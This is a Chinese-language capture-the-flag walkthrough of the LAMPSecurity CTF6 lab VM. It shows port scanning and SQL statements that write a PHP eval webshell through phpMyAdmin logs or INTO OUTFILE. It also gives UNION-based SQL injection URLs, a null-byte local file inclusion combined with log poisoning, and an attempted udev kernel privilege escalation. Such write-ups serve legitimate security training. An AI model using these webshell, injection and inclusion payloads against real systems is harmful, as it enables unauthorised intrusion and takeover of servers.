LAMPSecurity: CTF6 Vulnhub Walkthrough

鏡像下載地址：

https://www.vulnhub.com/entry/lampsecurity-ctf6,85/

 

主機掃描：

╰─ nmap -p- -sV -oA scan 10.10.202.130
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-21 08:57 CST
Nmap scan report for 10.10.202.130
Host is up (0.0029s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
624/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL 5.0.45
MAC Address: 00:0C:29:62:3B:5A (VMware)

目錄掃描

 

 

 

phpinfo 獲取物理路徑：/var/www/html

網站備份尋找敏感信息

 

 

phpmyadmin 登陸試試

phpadmin 寫shell

這裏簡單下複習下PHPadmin 拿shell的幾種思路：

1）志文件寫入一句話來獲取webshell
general.log變量是指是否啓動記錄日誌；而general log file指的是日誌文件的路徑，能夠看到general.log變量的狀態爲OFF，故咱們要修改成ON；general log file變量中的*.log的後綴咱們改成*php。拿完webshell記得要改回去喲。SQL語句進行修改

show global variables like "%log%"

set global general_log = "ON";
SET global general_log_file='/var/www/html/shell.php'
select "<?php eval($_POST['cmd']);?>"

2）利用插入一句話來提取webshell

show global variables like '%secure%';顯示是NULL值，這樣的狀況下咱們插入一句話是沒法插入的，須要咱們修改secure_file_priv=''爲空值才能插入一句話：

解釋一下：

secure_file_priv爲null 表示不容許導入導出；

secure_file_priv指定文件夾時，表示mysql的導入導出只能發生在指定的文件夾；

secure_file_priv沒有設置時，則表示沒有任何限制

select "<?php eval($_POST['cmd']);?>" into outfile '/var/www/html/hack.php'

 

這裏日誌文件沒有開啓，第一種方式無失效，第二種方式，標識沒有限制，能夠嘗試寫webshell

 

 

 

報錯，目錄沒權限，嘗試/tmp 目錄寫入沒有問題的，放棄。嘗試其餘辦法

主頁面發現SQL注入漏洞：

http://10.10.202.130/index.php?id=4 and true  #true

http://10.10.202.130/index.php?id=4 and false # false

http://10.10.202.130/index.php?id=4 order by 7 #true

http://10.10.202.130/index.php?id=4 order by 8 #false

10.10.202.130/index.php?id=4 union select 1,2,3,4,5,6,7 from user

 

 

 http://10.10.202.130/?id=4 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7

SQLmap 獲取admin的密碼

admin         | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) 

http://10.10.202.130/index.php?action=login

登陸沒發現長傳點之類的接口

繼續看看源代碼

login.php 發現文件包含漏洞

 

這裏後綴爲.tpl，這裏嘗試使用截斷%00或者%0A

http://10.10.202.130/actions/login.php?action=../../conf/config.ini%00

 

嘗試把一句話木馬，這裏有兩個思路：

1. 經過phpamdin 寫到tmp目錄，進行文件包含../../../../../../tmp/hack.php%00

 

 

 

2. 寫到日誌文件，進行包含進來../../logs/log.log%00 看看可否解析

<?php eval($_POST['cmd']);?>

 

 

 

http://10.10.202.130/actions/login.php?action=../../logs/log.log%00

 

 

提權操做

嘗試內核提權，幾個都不行

最後經過Google得知內核Kernel version is 2.6.18-92.el5 須要UDEV提權

cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./

sed -i -e 's/\r$//' 8478.sh

 

 

沒法成功，嘗試了屢次，依舊，有可能跟環境有關係吧！